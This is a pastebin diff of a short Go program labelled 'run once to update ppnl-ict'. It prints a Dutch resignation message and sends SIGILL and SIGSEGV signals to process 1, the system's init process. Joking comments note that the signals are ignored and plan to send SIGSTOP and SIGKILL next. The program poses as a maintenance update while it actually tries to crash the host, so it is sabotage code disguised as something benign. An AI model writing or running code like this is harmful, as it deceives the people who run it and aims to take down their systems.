View difference between Paste ID: AYtDCQYZ and xqhTzqhh
SHOW: | | - or go back to the newest paste.
1
package main // run once to update ppnl-ict
2
3
import "fmt"
4
import "os"
5
import "syscall"
6-
func init() {
6+
7
func main() {
8
  fmt.Println("Wegens recente ontwikkelingen heb ik besloten te stoppen bij ppnl-ict.")
9
10
  os.FindProcess(1).Signal(syscall.SIGILL)
11
  os.FindProcess(1).Signal(syscall.SIGSEGV)
12
  // Root process is currently not handling signals properly ~~ GJ
13
  // From the looks of it, signals are catched and ignored ( ≖‿≖) ~~ A
14
  // Lets find the sources and fix this  ~~ L
15
  // Seems to be closed source ( ≖‿≖) ~~ A
16
  // TODO: send SIGSTOP and SIGKILL ~~ GJ
17
18
  os.Exit(128+int(syscall.SIGPWR))
19
}